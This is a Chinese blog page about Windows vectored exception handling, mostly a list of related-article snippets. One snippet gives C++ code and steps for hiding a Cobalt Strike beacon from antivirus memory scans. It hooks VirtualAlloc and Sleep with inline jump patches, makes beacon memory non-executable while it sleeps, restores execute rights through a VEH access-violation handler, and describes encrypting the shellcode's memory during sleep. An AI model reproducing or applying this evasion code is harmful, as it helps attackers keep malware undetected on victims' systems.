向量化异常处理程序 继续处理程序 veh 例子

最新推荐文章于 2025-03-09 11:28:49 发布
原创 最新推荐文章于 2025-03-09 11:28:49 发布 · 8.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#exception #pointers #winapi #search #null #module

 

继续处理程序不知为何 竟然不触发!

 

 

异常处理与CrashRpt工具——(1)
Z's Palace
12-13 184
除此之外,我们可以为每一个异常设置若干处理函数,而这些处理函数会被放到一个链表中,当异常到达时,这些处理函数会被调用。语句不是这个异常错误所对应的正确异常处理模块,不能处理该异常,通知操作系统继续搜寻该线程其他的异常处理程序(系统将继续到上一层的。复合语句中的受保护执行的代码发生了异常,或受保护执行的代码调用的函数内部发生了异常并要求调用者来处理该异常,这样的语句是catch不到的,直接就会crash了,因为这是内存错误,硬件异常。中的代码,是在正常执行完之后进来的,还是因为全局展开或局部展开而进入的。
浅析Windows异常处理结构与实现
qq_41861225的博客
05-18 864
浅析Windows异常处理结构与实现   Windows异常处理是操作系统处理程序错误的一种手段,一般有两种:SHE(结构化异常处理)和VEH向量化异常处理),而UEF(TopLevalEH顶层异常处理)是基于SHE的(这之后应该还有一种VCH),下面我就从上面三方面分析一下Windows异常处理结构。 一、异常处理的个人理解简述   当正在运行一个程序产生了一个异常后,就会利用自身的异常处理来...
Windows异常学习笔记(三)—— VEH&SEH
lzyddf的博客
01-11 1900
Windows异常学习笔记(三)—— VEH&SEH前言要点回顾分析 KiUserExceptionDispatcher分析 _RtlDispatchException_RtlCallVectoredExceptionHandlersVEH向量化异常处理)实验:自定义VEH总结:VEH异常处理流程SEH(结构化异常处理)分析 RtlDispatchException实验:构造自定义SEH总结:SEH异常处理流程 前言 一、学习自滴水编程达人中级班课程,官网:https://bcdaren.com
4.VEH向量化异常处理
My classmates
10-30 7046
当用户异常产生后,内核函数KiDispatchException并不是像处理内核异常那样在0环直接进行处理,而是修正3环EIP为KiUserExceptionDispatcher函数后就结束了。 这样,当线程再次回到3环时,将会从KiUserExceptionDispatcher函数开始执行。 (ntdll.dll) KiUserExceptionDispatcher函数分析 调用 RtIDis...
DLL注入 + VEH 的方式处理异常
yusakul的博客
12-01 2461
从个人年久失修的git博客搬运 test.cpp #include "stdafx.h" #include <process.h> int main() { printf("输入\n"); int a, b; scanf_s("%d", &a); b = 1 / a; printf("%d\n", b); system("pause");
Windows异常处理
liaozhilong88的博客
01-18 859
异常机制,就是为了让计算机能够更好的处理程序运行期间产生的错误,从编程的角度来看,能够将错误的处理与程序的逻辑分隔开。使得我们可以集中精力开发关键功能,而把程序可能出现的异常统一管理。 Windows提供了异常处理的机制,使得你有机会挽救自己即将崩溃的程序,大体上来说它提供了以下处理异常的机制: SEH-结构化异常处理 VEH-向量化异常处理 VCH-向量化异常处...
CE-VEH下段崩溃处理.e
02-15
最新 CE VEH下段处理 源码 win7 win110 都测试过了 全部可以正常使用 声明:个别win10不能使用的话 请自己换系统 谢谢
《Windows核心编程》读书笔记二十五章 未处理异常,向量化异常处理与C++异常
sesiria的博客
12-25 1801
第二十五章  未处理异常,向量化异常处理与C++异常 本章内容 25.1 UnhandledExceptionFilter函数详解 25.2 即时调试 25.3 电子表格示例程序 25.4 向量化异常和继续处理程序 25.5 C++异常与结构化异常的比较 25.6 异常与调试器 前一章讨论的异常过滤函数返回EXCEPTION_CONTINUE_SEARCH继续向外
Windows的异常处理
qq_42814021的博客
11-14 2342
文章目录Windows的异常处理SEHSEH的终结处理SEH的异常处理过滤表达式嵌套使用异常处理和终结处理SEH的实现机制局部展开全局展开VEHSEH和VEH的区别 Windows的异常处理 Windows系统的异常处理有两种: 结构化异常处理(SEH,Structured Exception Handling) 向量化异常处理(VEH,Vectored Exception Handling) SEH Windows定义了SEH机制来规范异常处理代码的设计(对程序员)和编译(对编译器)。 SEH 提供了
windows中的异常处理 windows中的主要异常处理机制:VEH、SHE、C++EH。 SEH中文全称:结构化异常处理。就是平常用的 __try__finally __try__except,是对C的扩展。 WEH中文名称:向量异常处理。一般来说用AddVectorExceptionHandler 去添加一个异常处理函数,可以通过第一个参数决定是否将VEH函数插入到VEH链表头,插入链表头的函数先执行,如果为1,则会最优先执行。 C++EH是C++提供的异常处理方式,执行顺序将排在最后。 在用户模式下发生异常时,异常处理分发函数在内部会先调用遍历VEH记录链表的函数,如果没有找到可以处理异常的注册函数,再开始遍历SEH注册链表。 Windows异常处理顺序流程 终止当前程序的执行-->调试器(进程必须被调试,向调试器发送EXCEPTION_DEBUG_EVENT消息)-->执行VEH-->执行SEH-->TopLevelEH(进程调试时不会被执行)-->执行VEH-->交给调试器(上面的异常处理都说处理不了,就再次交给调试器)-->调用异常端口通知csrss.exe 通过流程可以看到VEH的执行顺序是先于SEH的 通过VEH异常处理规避内存扫描 当AV扫描进程空间的时候,并不会将所有的内存空间都扫描一遍,只会扫描敏感的内存区域。 所谓敏感内存区域就是指可执行的区域。思路就是不断改变某一块内存属性,当执行命令或者某些操作的时候,执行的内存属性是可执行的,当功能模块进入睡眠的时候将内存属性改为不可执行。 当执行的地址空间为不可执行时,若强行执行会返回0xc0000005异常,这个异常是指没有执行权限。所以通过VEH抓取这个异常,即可根据需求,动态的改变内存属性,进而逃避内存扫描。 当触发0xc0000005异常的时候需要恢复内存的可执行属性,就通过AddVectoredExceptionHandler去注册一个异常处理函数,作用就是更改内存属性为可执行。那么就需要知道是哪一块地址需要修改,这里要根据申请空间的API决定,如果是 VirtualAlloc 就hook VirtualAlloc ,如果是其他申请空间API就hook其他API,这个根据具体的c2profile配置有关。如果不使用c2profile,那么就是默认使用 VirtualAlloc分配空间, 还有一个需要去hook的就是Sleep,因为需要在执行Sleep的时候就将功能模块的内存属性改为不可执行,规避内存扫描。 封装了一个HOOK变量, class HOOK { public: HOOK(); ~HOOK(); BOOL Vir_FLAG; HANDLE hEvent; BYTE g_OldAlloc[5]; BYTE g_OldSleep[5]; DWORD Beacon_flOldProtect; LPVOID BeaconAddress; SIZE_T BeaconLen; void HookVirtualAlloc(); void UnHookVirtualAlloc(); void HookSleep(); void UnHookSleep(); }; AI写代码 #include"HookVirtual.h" extern HOOK hook; HOOK::HOOK() { Vir_FLAG=FALSE; hEvent= CreateEvent(NULL, FALSE, FALSE, NULL); Beacon_flOldProtect=0; BeaconAddress=NULL; BeaconLen=0; for (int i = 0; i < 5; i++) { g_OldAlloc[i] = 0; }; for (int i = 0; i < 5; i++) { g_OldSleep[i] = 0; }; } HOOK::~HOOK() { } static LPVOID (WINAPI* OldVirtualAlloc)( _In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect )=VirtualAlloc; static VOID(WINAPI* OldSleep)(_In_ DWORD dwMilliseconds)=Sleep; LPVOID WINAPI NewVirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ) { hook.UnHookVirtualAlloc(); hook.BeaconLen = dwSize; hook.BeaconAddress = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect); hook.HookVirtualAlloc(); printf("分配大小:%d\n", hook.BeaconLen); printf("分配地址:%d\n", hook.BeaconAddress); return hook.BeaconAddress; } void WINAPI NewSleep( _In_ DWORD dwMilliseconds ) { if (hook.Vir_FLAG) { VirtualFree(hook.BeaconAddress, 0, MEM_RELEASE); hook.Vir_FLAG = false; } printf("sleep时间:%d\n", dwMilliseconds); hook.UnHookSleep(); OldSleep(dwMilliseconds); hook.HookSleep(); SetEvent(hook.hEvent); //解锁 } void HOOK::HookVirtualAlloc() { DWORD dwAllocOldProtect = NULL; BYTE PAllocData[5] = { 0xe9,0x0,0x0,0x0,0x0 }; RtlCopyMemory(g_OldAlloc, OldVirtualAlloc, sizeof(PAllocData));//保存原来的硬编码 DWORD dwAllocOffset = (DWORD)NewVirtualAlloc - (DWORD)OldVirtualAlloc - 5;//计算偏移 /*因为你将要构建的跳转指令通常是 5 个字节长(0xE9 指令)。这是因为 x86 汇编中的无条件跳转指令需要 5 个字节来包括跳转指令本身以及相对偏移值。*/ RtlCopyMemory(&PAllocData[1], &dwAllocOffset, sizeof(dwAllocOffset));//得到完整的PAllocData VirtualProtect(OldVirtualAlloc, 5, PAGE_EXECUTE_READWRITE, &dwAllocOldProtect);//改为可写属性 RtlCopyMemory(OldVirtualAlloc, PAllocData, sizeof(PAllocData));//将偏移地址写入,跳转到新的 VirtualProtect(OldVirtualAlloc, 5, dwAllocOldProtect, &dwAllocOldProtect); }; void HOOK::UnHookVirtualAlloc() { DWORD dwOldProtect = NULL; VirtualProtect(OldVirtualAlloc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect); RtlCopyMemory(OldVirtualAlloc, g_OldAlloc, sizeof(g_OldAlloc));//还原硬编码 VirtualProtect(OldVirtualAlloc, 5, dwOldProtect, &dwOldProtect);//还原属性 } void HOOK::HookSleep() { DWORD dwSleepOldProtect = NULL; BYTE PSleepData[5] = { 0xe9,0x0,0x0,0x0,0x0 }; RtlCopyMemory(g_OldSleep, OldSleep, sizeof(PSleepData));//保存原来的硬编码 DWORD dwSleepOffset = (DWORD)(NewSleep) - (DWORD)OldSleep - 5; //计算偏移 /*因为你将要构建的跳转指令通常是 5 个字节长(0xE9 指令)。这是因为 x86 汇编中的无条件跳转指令需要 5 个字节来包括跳转指令本身以及相对偏移值。*/ RtlCopyMemory(&PSleepData[1], &dwSleepOffset, sizeof(dwSleepOffset));//得到完整的PAllocData VirtualProtect(OldSleep, 5, PAGE_READWRITE, &dwSleepOldProtect);//改为可写属性 RtlCopyMemory(OldSleep, PSleepData, sizeof(PSleepData));//将偏移地址写入,跳转到新的 VirtualProtect(OldSleep, 5, dwSleepOldProtect, &dwSleepOldProtect); } void HOOK::UnHookSleep() { DWORD dwOldProtect = NULL; VirtualProtect(OldSleep, 5, PAGE_READWRITE, &dwOldProtect); RtlCopyMemory(OldSleep, g_OldSleep, sizeof(g_OldSleep));//还原硬编码 VirtualProtect(OldSleep, 5, dwOldProtect, &dwOldProtect);//还原属性 } AI写代码 然后就是注册异常函数,这个异常函数就是为了恢复可执行内存属性。 BOOL is_Exception(DWORD eipValue) { if (eipValue > 0x1000) { return true; } else { return false; } } AI写代码 is_Exception函数是为了验证是不是在申请空间内范围出现异常,而不是其他内存空间。(NTAPI是一种调用约定) 起一个线程,让它不断等待sleep函数通知,通知后就将内存空间设置为不可执行,线程控制的话就用到了事件。 LONG NTAPI PvectoredExceptionHandler(PEXCEPTION_POINTERS ExceptionInfo) { wprintf(L"异常错误码:%x\n", ExceptionInfo->ExceptionRecord->ExceptionCode); wprintf(L"线程地址:%lx\n", ExceptionInfo->ExceptionRecord->ExceptionAddress); if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(ExceptionInfo->ContextRecord->Eip)) { printf("恢复可执行内存属性"); VirtualProtect(hook.BeaconAddress, hook.BeaconLen, PAGE_EXECUTE_READWRITE, &hook.Beacon_flOldProtect); return EXCEPTION_CONTINUE_EXECUTION; } return EXCEPTION_CONTINUE_SEARCH; } DWORD WINAPI SetNoExecutable(LPVOID lpParameter) { while (true) { //等待解锁 WaitForSingleObject(hook.hEvent, INFINITE); printf("设置Beacon内存属性不可执行\n"); VirtualProtect(hook.BeaconAddress, hook.BeaconLen, PAGE_READWRITE, &hook.Beacon_flOldProtect); //设置事件为未被通知的,重新上锁 ResetEvent(hook.hEvent); } } AI写代码 由于杀软并不是一直扫描内存,而是间歇性的扫描敏感内存,因此可以在cs的shellcode调用sleep休眠将可执行内存区域加密,在休眠结束时,再将内存解密来规避杀软内存扫描达到免杀目的。进行内存加密时,需要注意的一点,需要加密的不是我们为shellcode申请的内存,而是shellcode自己使用virtualalloc函数申请的内存。 我们需要对 shellcode 自己使用 VirtualAlloc 函数申请的内存 2 进行加密,这就需要挂钩 sleep 函数到我们自定义的 HookSleep 函数: 在进入 HookSleep 函数时使用自定义加密函数对内存 2 进行加密并使用 VirtualProtect 更改内存 2 权限为 PAGE_NOACCESS,使其不可访问。 恢复原来的 Sleep 函数并调用原函数进行休眠。 在退出 HookSleep 函数时对内存 2 进行解密并使用 VirtualProtect 更改内存 2 权限为可执行权限 PAGE_EXECUTE。 分析
最新发布
07-24
2. VEH向量化异常处理) 3. SEH(结构化异常处理) 4. TopLevelEH(顶层异常处理,但在进程被调试时不会执行) 5. 再次执行VEH(如果前面的处理没有解决异常) 6. 再次交给调试器(如果VEH第二次处理也没有解决) ...
[易语言源码]-进程全局VEH
05-06
[易语言源码]-进程全局VEH
易语言实现CE+VEH硬件断点查找访问该地址的代码-易语言
06-12
VEH异常处理+硬件断点 捕获内存的读写xx 参考自CE的查找访问该地址的代码的功能
易语言 完美硬断源码
08-11
修改的硬断,完美支持某讯game,
易语言-利用硬断+VEH实现APIHOOK
06-25
由于E写的可能有点特殊错误 所以附上C源码和C编译的DLL一份 DLL要用动态调用 E不支持Cdecl Context->Dr7是一个很好玩的东东 还有很多好玩的用法详细的请自行百度 代码里有一点点注释将就着看吧 原理也很简单 可以指定HOOK某线程调用某API  大牛就别来吐槽了 - -转来的哦 只在XP WIN7 X32 下测试通过
e语言-利用硬断 VEH实现APIHOOK
08-23
由于E写的可能有点特殊错误 所以附上C源码和C编译的DLL一份 DLL要用动态调用 E不支持CdeclContext->Dr7是一个很好玩的东东 还有很多好玩的用法详细的请自行百度 代码里有一点点注释将就着看吧 原理也很简单 可以指定HOOK某线程调用某API  大牛就别来吐槽了 - -转来的哦只在XP WIN7 X32 下测试通过
VEH Hook 及 检测
热门推荐
零点起步
04-15 1万+
SEH(Struct Exception Handler,结构化异常) VEH(Vector Exception Handler,向量异常处理) SEH是OS提供给线程来感知和处理异常的一种回调机制。 在Intel Win32平台上,由于FS寄存器问题指向当前的TIB(线程信息块),因此FS:[0]处能找到最新的一个EXCEPTION_REGISTRATION_RECORD结构。 typed
向量化异常处理
mslieng1011的博客
11-05 1359
VEH : AddVectoredExceptionHandler(0,回调函数) LONG vehExceptionHandler(EXCEPTION_POINTERS* Exceptioninfo) VCH : AddVectoredContinueHandler(0,回调函数) LONG vchContinueHandler(EXCEPTION_POINTERS* Exception
异常和异常处理(windows平台)
mirlieyan的专栏
12-04 835
About Exceptions and Exception Handling About Exception程序遇到一个异常或一个严重的错误时,通常意味着它不能继续正常运行并且需要停止执行。 例如,当遇到下列情况时,程序会出现异常:   程序访问一个不可用的内存地址(例如,NULL指针); l 无限递归导致的栈溢出; l 向一个较小的缓冲区
Windows系统编程(六)异常处理
2301_78838647的博客
03-09 1254
在Windows下,有两种异常:1.结构化异常 SEH2.向量化异常 VEH接下来我们学习这两种异常。
深入解析易语言中的向量化异常处理技术
向量化异常处理(Vectorized Exception Handling,VEH)是一种在Windows平台下对异常进行处理的高级技术,它允许在程序中添加或移除异常处理函数,以处理异常情况。 首先,我们需要了解易语言中的异常处理机制。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值